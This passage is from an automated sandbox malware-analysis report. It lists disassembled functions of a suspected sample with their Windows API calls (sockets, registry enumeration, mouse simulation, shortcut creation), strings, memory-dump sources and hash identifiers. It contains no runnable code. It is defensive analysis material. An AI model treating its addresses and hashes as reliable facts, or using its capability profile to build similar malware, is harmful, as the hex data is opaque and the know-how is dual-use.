                                              • Opcode Fuzzy Hash: 872ea8f9ebcb39f5de1d0c942b39d967282daa37af9b81672f64b97fef293bfa
                                              • Instruction Fuzzy Hash: 2D214F72604309EBDB209F689C04AAAB7E4EF55728F205A19FEB1F32D1D7709940CB60
                                              Function 00F14A0C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00E8771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E87759
                                                • Part of subcall function 00E8771B: GetStockObject.GDI32(00000011), ref: 00E8776D
                                                • Part of subcall function 00E8771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E87777
                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F14A71
                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F14A7E
                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F14A89
                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F14A98
                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F14AA4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: MessageSend$CreateObjectStockWindow
                                              • String ID: Msctls_Progress32
                                              • API String ID: 1025951953-3636473452
                                              • Opcode ID: 1009c73c52ca4162f57cb04ca35626a0d43259d54724534f09d46e4041066207
                                              • Instruction ID: 6623ba044b84e03d39b9e0057e3869edb4f5cebeb78c144b0819cc0f60ffa8c3
                                              • Opcode Fuzzy Hash: 1009c73c52ca4162f57cb04ca35626a0d43259d54724534f09d46e4041066207
                                              • Instruction Fuzzy Hash: E611B6B214021DBEEF119FA4CC81EEB7F9DEF09798F014111BB18A6090C676DC61EBA4
                                              Function 00EEE223 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00EEE23D
                                              • LoadStringW.USER32(00000000), ref: 00EEE244
                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00EEE25A
                                              • LoadStringW.USER32(00000000), ref: 00EEE261
                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00EEE2A5
                                              Strings
                                              • %s (%d) : ==> %s: %s %s, xrefs: 00EEE282
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: HandleLoadModuleString$Message
                                              • String ID: %s (%d) : ==> %s: %s %s
                                              • API String ID: 4072794657-3128320259
                                              • Opcode ID: a75fce18080dee59a915ecb54f538563cacc30af18ae729b5bae3fa36e595b12
                                              • Instruction ID: 068ae343f3a5667df45ce276bff581abcbb62cf31019f3be0b6654004a131c5f
                                              • Opcode Fuzzy Hash: a75fce18080dee59a915ecb54f538563cacc30af18ae729b5bae3fa36e595b12
                                              • Instruction Fuzzy Hash: EF0112F690021CBFE711AB949D89EE6777CD708300F015595BB45F2051E6749E849B71
                                              Function 00F025BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00F0271D
                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F0273E
                                              • WSAGetLastError.WSOCK32 ref: 00F0274F
                                              • htons.WSOCK32(?,?,?,?,?), ref: 00F02838
                                              • inet_ntoa.WSOCK32(?), ref: 00F027E9
                                                • Part of subcall function 00EE4277: _strlen.LIBCMT ref: 00EE4281
                                                • Part of subcall function 00F03B81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00EFF569), ref: 00F03B9D
                                              • _strlen.LIBCMT ref: 00F02892
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                              • String ID:
                                              • API String ID: 3203458085-0
                                              • Opcode ID: e47d986417babe6cff49045183bfbdc539538f5c2d967425585a649c103e61ae
                                              • Instruction ID: 86a8d95da90d9a02274168e71387f60b37f0a743e6bddd13630cca2be79b3bc4
                                              • Opcode Fuzzy Hash: e47d986417babe6cff49045183bfbdc539538f5c2d967425585a649c103e61ae
                                              • Instruction Fuzzy Hash: 9EB10535604300AFC314EF24C889F2A77E5AF85328F54954CF45A5B2E2CB31ED45EBA1
                                              Function 00EB0547 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                              Download Yara Rule
                                              APIs
                                              • __allrem.LIBCMT ref: 00EB044A
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EB0466
                                              • __allrem.LIBCMT ref: 00EB047D
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EB049B
                                              • __allrem.LIBCMT ref: 00EB04B2
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EB04D0
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                              • String ID:
                                              • API String ID: 1992179935-0
                                              • Opcode ID: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                                              • Instruction ID: 568af0d05b6b54b27604faf66bc4adbada824cec2db87f9170249af2613455a4
                                              • Opcode Fuzzy Hash: 2c635347f6fb7bc080f97231395b1708db1b00bed18cf3e190c3431c6bc10d53
                                              • Instruction Fuzzy Hash: F681E872A007069FE7249E68CC81BEB73E8AF44764F24652EF651F7691EB70F9018790
                                              Function 00EB658E Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00EA8669,00EA8669,?,?,?,00EB67DF,00000001,00000001,8BE85006), ref: 00EB65E8
                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00EB67DF,00000001,00000001,8BE85006,?,?,?), ref: 00EB666E
                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00EB6768
                                              • __freea.LIBCMT ref: 00EB6775
                                                • Part of subcall function 00EB3BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00EA6A99,?,0000015D,?,?,?,?,00EA85D0,000000FF,00000000,?,?), ref: 00EB3BE2
                                              • __freea.LIBCMT ref: 00EB677E
                                              • __freea.LIBCMT ref: 00EB67A3
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                              • String ID:
                                              • API String ID: 1414292761-0
                                              • Opcode ID: 1e0b24096b86d430be362cdd5281df683ceb8eb1ae282b1e94d7959847de74a3
                                              • Instruction ID: 36697e873604a39004f6e501e61c7afb850963eb4df4aa5c47da29d9c4cc397d
                                              • Opcode Fuzzy Hash: 1e0b24096b86d430be362cdd5281df683ceb8eb1ae282b1e94d7959847de74a3
                                              • Instruction Fuzzy Hash: 1D51C472600226ABDB258F64CC82EFF77A9EB44758F15566AFD04FA150EF38DC50CA90
                                              Function 00F0C53A Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00E8B25F: _wcslen.LIBCMT ref: 00E8B269
                                                • Part of subcall function 00F0D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F0C00D,?,?), ref: 00F0D314
                                                • Part of subcall function 00F0D2F7: _wcslen.LIBCMT ref: 00F0D350
                                                • Part of subcall function 00F0D2F7: _wcslen.LIBCMT ref: 00F0D3C7
                                                • Part of subcall function 00F0D2F7: _wcslen.LIBCMT ref: 00F0D3FD
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F0C629
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F0C684
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00F0C6C9
                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F0C6F8
                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F0C752
                                              • RegCloseKey.ADVAPI32(?), ref: 00F0C75E
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                              • String ID:
                                              • API String ID: 1120388591-0
                                              • Opcode ID: 39bd880ca65182add8934dd6b4b78bee894c48103da431a3804082279d00cb41
                                              • Instruction ID: a0574e6810b8cf47f43eb0a6d5e1e8eb39661cb6351025a1a1e11db5c784cb06
                                              • Opcode Fuzzy Hash: 39bd880ca65182add8934dd6b4b78bee894c48103da431a3804082279d00cb41
                                              • Instruction Fuzzy Hash: F681A071608241AFD714EF24C884E2ABBF5FF84318F14955CF4998B2A2DB31ED45EB92
                                              Function 00EE003D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VariantInit.OLEAUT32(00000035), ref: 00EE0049
                                              • SysAllocString.OLEAUT32(00000000), ref: 00EE00F0
                                              • VariantCopy.OLEAUT32(00EE02F4,00000000), ref: 00EE0119
                                              • VariantClear.OLEAUT32(00EE02F4), ref: 00EE013D
                                              • VariantCopy.OLEAUT32(00EE02F4,00000000), ref: 00EE0141
                                              • VariantClear.OLEAUT32(?), ref: 00EE014B
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCopy$AllocInitString
                                              • String ID:
                                              • API String ID: 3859894641-0
                                              • Opcode ID: cf72565efda78afe83b3cdfda6f23e80da181cab62826b4c2dd787e292e7a657
                                              • Instruction ID: 8b414fdedc332d10c7b6065351c8a505d227f56a1b2bc40c4b2b2d3feaa93228
                                              • Opcode Fuzzy Hash: cf72565efda78afe83b3cdfda6f23e80da181cab62826b4c2dd787e292e7a657
                                              • Instruction Fuzzy Hash: 52510731500388EFCF20AB669885B6973E4EF59310F24B447EA05FF296EBB49C84CB51
                                              Function 00F18B3A Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00EDFB8F,00000000,?,?,00000000,?,00EC39BC,00000004,00000000,00000000), ref: 00F18BAB
                                              • EnableWindow.USER32(?,00000000), ref: 00F18BD1
                                              • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00F18C30
                                              • ShowWindow.USER32(?,00000004), ref: 00F18C44
                                              • EnableWindow.USER32(?,00000001), ref: 00F18C6A
                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00F18C8E
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Window$Show$Enable$MessageSend
                                              • String ID:
                                              • API String ID: 642888154-0
                                              • Opcode ID: 26a20e73bc9dd0cccf86b346b77c7e8a62e4cecbb589cfac7a0d9c3399f71f10
                                              • Instruction ID: 58e1e2009f9d90b48986c6f6621dce4ad3839f45d38c77282dcd229833b69f2c
                                              • Opcode Fuzzy Hash: 26a20e73bc9dd0cccf86b346b77c7e8a62e4cecbb589cfac7a0d9c3399f71f10
                                              • Instruction Fuzzy Hash: 2041DB74A05248AFDB16CF14C989FE57BF1FB46355F144269E6094F2B2CB31A882FB50
                                              Function 00F02C37 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetForegroundWindow.USER32(?,?,00000000), ref: 00F02C45
                                                • Part of subcall function 00EFEE49: GetWindowRect.USER32(?,?), ref: 00EFEE61
                                              • GetDesktopWindow.USER32 ref: 00F02C6F
                                              • GetWindowRect.USER32(00000000), ref: 00F02C76
                                              • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00F02CB2
                                              • GetCursorPos.USER32(?), ref: 00F02CDE
                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F02D3C
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                              • String ID:
                                              • API String ID: 2387181109-0
                                              • Opcode ID: 90f44dcd48557a7dd43fe4267ade9a513b38a3d9f58a9d35d34ecedfe82ce16c
                                              • Instruction ID: f55fc4806f62b359e67982ff8070075a2dd7e8c62f8f4866bbfa2703c8a36ed4
                                              • Opcode Fuzzy Hash: 90f44dcd48557a7dd43fe4267ade9a513b38a3d9f58a9d35d34ecedfe82ce16c
                                              • Instruction Fuzzy Hash: C931F072505319ABD720DF18C848B9EB7E9FF84324F004919F485A72D1DB30E904EBA2
                                              Function 00EF6178 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00E8557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E85558,?,?,00EC4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E8559E
                                              • _wcslen.LIBCMT ref: 00EF61D5
                                              • CoInitialize.OLE32(00000000), ref: 00EF62EF
                                              • CoCreateInstance.OLE32(00F20CC4,00000000,00000001,00F20B34,?), ref: 00EF6308
                                              • CoUninitialize.OLE32 ref: 00EF6326
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                              • String ID: .lnk
                                              • API String ID: 3172280962-24824748
                                              • Opcode ID: 2e39e70efdb8adc06036e2f388bfba7381ef1be60c61f0810da91c9202632eff
                                              • Instruction ID: 8573bdefe0ddd8cbf843dd3cd0b65cd09863ea048ad431e11fbc39a23d63656e
                                              • Opcode Fuzzy Hash: 2e39e70efdb8adc06036e2f388bfba7381ef1be60c61f0810da91c9202632eff
                                              • Instruction Fuzzy Hash: C6D142716042159FC714EF24C484A2ABBF5FF89718F14989CF98AAB361CB31EC45CB92
                                              Function 00EE2104 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00EE210F
                                              • UnloadUserProfile.USERENV(?,?), ref: 00EE211B
                                              • CloseHandle.KERNEL32(?), ref: 00EE2124
                                              • CloseHandle.KERNEL32(?), ref: 00EE212C
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00EE2135
                                              • HeapFree.KERNEL32(00000000), ref: 00EE213C
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                              • String ID:
                                              • API String ID: 146765662-0
                                              • Opcode ID: 62f7115d2d5c11b39f3acd449f6f339f5cb49d4d526e1dcf7fde452f55b1b678
                                              • Instruction ID: 48ca62a83ffe8fd78619c2bd1c41b693de463fcf11fcde1b65b3f5545027a8c1
                                              • Opcode Fuzzy Hash: 62f7115d2d5c11b39f3acd449f6f339f5cb49d4d526e1dcf7fde452f55b1b678
                                              • Instruction Fuzzy Hash: D4E01A76404109BFEB011FA1ED0CD8ABF3AFF49322B12C220F225920B0CB329420EB50
                                              Function 00EECD90 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00E84154: _wcslen.LIBCMT ref: 00E84159
                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EECEAE
                                              • _wcslen.LIBCMT ref: 00EECEF5
                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EECF5C
                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00EECF8A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info_wcslen$Default
                                              • String ID: 0
                                              • API String ID: 1227352736-4108050209
                                              • Opcode ID: f06e0b555671fc0d3b1edf87e2b09bea02ecedb59748b9e284813fe358f30f71
                                              • Instruction ID: 8c3a64dc5229f01f93dd5374aaa4c0ee69809eed9880e3388bd19b70bac494f0
                                              • Opcode Fuzzy Hash: f06e0b555671fc0d3b1edf87e2b09bea02ecedb59748b9e284813fe358f30f71
                                              • Instruction Fuzzy Hash: 9C5125713043885FD714DF2AC844BABB7E5AF8A318F241A2DF994F62A0D770D906D752
                                              Function 00F146DB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F14794
                                              • IsMenu.USER32(?), ref: 00F147A9
                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F147F1
                                              • DrawMenuBar.USER32 ref: 00F14804
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Menu$Item$DrawInfoInsert
                                              • String ID: 0
                                              • API String ID: 3076010158-4108050209
                                              • Opcode ID: 90fccbb0608df38e027aecf0f020626e5b7c3f6655cc7374c36a78b375e04af3
                                              • Instruction ID: a68aa1d1b31873e7e31165dd2297a057f2e34b0b2f8e23f885487773fc6f09ea
                                              • Opcode Fuzzy Hash: 90fccbb0608df38e027aecf0f020626e5b7c3f6655cc7374c36a78b375e04af3
                                              • Instruction Fuzzy Hash: 0C412975A01249AFDB20CF54D884AEABBB5FF85364F048129E905A7390C731ED90EF60
                                              Function 00EE2672 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00E8B25F: _wcslen.LIBCMT ref: 00E8B269
                                                • Part of subcall function 00EE4536: GetClassNameW.USER32(?,?,000000FF), ref: 00EE4559
                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00EE26F6
                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00EE2709
                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00EE2739
                                                • Part of subcall function 00E884B7: _wcslen.LIBCMT ref: 00E884CA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: MessageSend$_wcslen$ClassName
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 2081771294-1403004172
                                              • Opcode ID: 4964cc89f31d49412f83dc66c8051639641cde61feae4346879b1816f22a435d
                                              • Instruction ID: b5fdd0d826683e7116272510deb1e9569cb591a9810cf052114ce35cb651ee35
                                              • Opcode Fuzzy Hash: 4964cc89f31d49412f83dc66c8051639641cde61feae4346879b1816f22a435d
                                              • Instruction Fuzzy Hash: BD21F371A00148BFDB14AFB1D885CFEBBBCDF95754B10611AF925B71E1DB38490A9710
